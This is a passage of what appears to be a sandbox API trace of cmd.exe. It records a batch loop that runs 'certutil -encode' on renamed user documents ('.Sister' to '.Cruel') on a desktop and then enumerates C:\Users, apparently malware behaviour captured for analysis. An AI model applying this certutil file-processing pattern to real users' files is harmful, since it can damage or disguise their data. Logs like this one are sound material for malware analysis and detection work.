lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0244.732] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0244.732] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0244.732] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0244.732] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0244.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.732] GetFileType (hFile=0x50) returned 0x2 [0244.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.732] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0244.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.802] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0244.811] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.811] GetFileType (hFile=0x50) returned 0x2 [0244.811] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.811] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0244.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.868] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69ab0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d69ab0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0244.914] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\" ") returned 60 [0244.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.914] GetFileType (hFile=0x50) returned 0x2 [0244.914] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.914] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0244.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.941] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x3c) returned 1 [0244.943] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0244.943] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.943] GetFileType (hFile=0x50) returned 0x2 [0244.943] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0244.943] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0244.944] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.944] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0244.949] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0244.949] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0244.949] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0244.949] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0244.949] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0244.949] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0244.949] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0244.950] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0244.950] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0244.950] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0244.950] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0244.950] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0244.950] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0244.950] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0244.950] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0244.950] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0244.950] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0244.950] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0244.950] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0244.950] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0244.950] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0244.950] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0244.950] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0244.950] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0244.950] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0244.950] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0244.950] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0244.950] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0244.950] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0244.950] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0244.950] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0244.950] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0244.950] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0244.951] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0244.951] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0244.951] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0244.951] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0244.951] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0244.951] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0244.951] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0244.951] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0244.951] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0244.951] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0244.951] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0244.951] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0244.951] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0244.951] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0244.951] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0244.951] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0244.951] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0244.951] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0244.951] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0244.953] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0244.953] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0244.953] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0244.954] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0244.954] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0244.954] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0244.954] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0244.954] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0244.954] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0244.954] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0244.954] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0244.954] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0244.954] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0244.954] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0244.954] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0244.954] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0244.954] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0244.954] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0244.954] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0244.954] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0244.954] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0244.954] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0244.954] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0244.954] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0244.954] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0244.954] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0244.954] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0244.954] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0244.954] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0244.954] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0244.955] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0244.955] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0244.955] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0244.955] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0244.955] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0244.955] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0244.955] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0244.955] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0244.955] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0244.955] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0244.955] ??_V@YAXPEAX@Z () returned 0x1 [0244.955] GetProcessHeap () returned 0x21ed8c70000 [0244.955] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93113f0 [0244.955] GetProcessHeap () returned 0x21ed8c70000 [0244.955] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x9a) returned 0x21ed8c75930 [0244.955] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0244.955] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0244.956] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0244.956] GetProcessHeap () returned 0x21ed8c70000 [0244.956] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93213e0 [0244.957] SetErrorMode (uMode=0x0) returned 0x0 [0244.957] SetErrorMode (uMode=0x1) returned 0x0 [0244.957] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93213f0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0244.957] SetErrorMode (uMode=0x0) returned 0x1 [0244.957] GetProcessHeap () returned 0x21ed8c70000 [0244.957] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93213e0, Size=0x52) returned 0x21ed93213e0 [0244.957] GetProcessHeap () returned 0x21ed8c70000 [0244.957] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93213e0) returned 0x52 [0244.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0244.957] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0244.957] GetProcessHeap () returned 0x21ed8c70000 [0244.957] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5f9e0 [0244.958] GetProcessHeap () returned 0x21ed8c70000 [0244.958] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed9980250 [0244.958] GetProcessHeap () returned 0x21ed8c70000 [0244.958] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980250, Size=0x1be) returned 0x21ed9980250 [0244.958] GetProcessHeap () returned 0x21ed8c70000 [0244.958] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980250) returned 0x1be [0244.958] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0244.958] GetProcessHeap () returned 0x21ed8c70000 [0244.958] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c79180 [0244.958] GetProcessHeap () returned 0x21ed8c70000 [0244.958] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c79180, Size=0x7e) returned 0x21ed8c79180 [0244.958] GetProcessHeap () returned 0x21ed8c70000 [0244.958] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c79180) returned 0x7e [0244.958] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.958] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0244.959] GetLastError () returned 0x2 [0244.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.959] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0244.959] GetLastError () returned 0x2 [0244.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.959] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cee0 [0244.960] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0244.960] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0244.960] GetLastError () returned 0x2 [0244.960] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cb80 [0244.960] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0244.960] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0244.960] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0244.960] ??_V@YAXPEAX@Z () returned 0x1 [0244.960] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0244.961] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0244.961] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0244.961] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0244.961] GetProcessHeap () returned 0x21ed8c70000 [0244.961] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e00 [0244.961] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0244.961] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.962] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0244.963] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0244.963] GetProcessHeap () returned 0x21ed8c70000 [0244.963] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0244.963] GetProcessHeap () returned 0x21ed8c70000 [0244.963] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c959e0 [0244.963] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0244.963] _get_osfhandle (_FileHandle=1) returned 0x50 [0244.964] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0244.964] _get_osfhandle (_FileHandle=0) returned 0x4c [0244.964] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0244.964] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"qyx1bfBq1UB8.odt.Sister\" \"qyx1bfBq1UB8.odt.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1294, dwThreadId=0x10ac)) returned 1 [0244.979] CloseHandle (hObject=0xa8) returned 1 [0244.979] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0244.979] GetProcessHeap () returned 0x21ed8c70000 [0244.979] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0244.979] GetEnvironmentStringsW () returned 0x21ed8d44660* [0244.979] GetProcessHeap () returned 0x21ed8c70000 [0244.979] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0244.979] FreeEnvironmentStringsA (penv="=") returned 1 [0244.979] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0246.627] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0246.627] CloseHandle (hObject=0xa4) returned 1 [0246.627] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0246.628] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0246.628] GetProcessHeap () returned 0x21ed8c70000 [0246.628] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0246.628] GetEnvironmentStringsW () returned 0x21ed8d44660* [0246.628] GetProcessHeap () returned 0x21ed8c70000 [0246.628] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0246.628] FreeEnvironmentStringsA (penv="=") returned 1 [0246.628] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0246.628] GetProcessHeap () returned 0x21ed8c70000 [0246.628] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0246.628] GetEnvironmentStringsW () returned 0x21ed8d44660* [0246.629] GetProcessHeap () returned 0x21ed8c70000 [0246.629] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0246.629] FreeEnvironmentStringsA (penv="=") returned 1 [0246.629] GetProcessHeap () returned 0x21ed8c70000 [0246.629] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c959e0) returned 1 [0246.629] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0246.629] ??_V@YAXPEAX@Z () returned 0x1 [0246.629] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c334170, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0x4fecbaf0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x4fecbaf0, ftLastWriteTime.dwHighDateTime=0x1d5e39e, nFileSizeHigh=0x0, nFileSizeLow=0x90da, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="rBP 3.rtf.Sister", cAlternateFileName="")) returned 1 [0246.629] GetProcessHeap () returned 0x21ed8c70000 [0246.629] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45380, Size=0x482) returned 0x21ed8d45380 [0246.629] GetProcessHeap () returned 0x21ed8c70000 [0246.629] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45380) returned 0x482 [0246.629] GetProcessHeap () returned 0x21ed8c70000 [0246.629] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69d10 [0246.630] GetProcessHeap () returned 0x21ed8c70000 [0246.630] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69d10, Size=0x58) returned 0x21ed8d69d10 [0246.630] GetProcessHeap () returned 0x21ed8c70000 [0246.630] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69d10) returned 0x58 [0246.630] GetProcessHeap () returned 0x21ed8c70000 [0246.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69d80 [0246.630] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0246.630] GetProcessHeap () returned 0x21ed8c70000 [0246.630] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x32) returned 0x21ed8cc8710 [0246.630] ??_V@YAXPEAX@Z () returned 0x1 [0246.630] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0246.630] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, 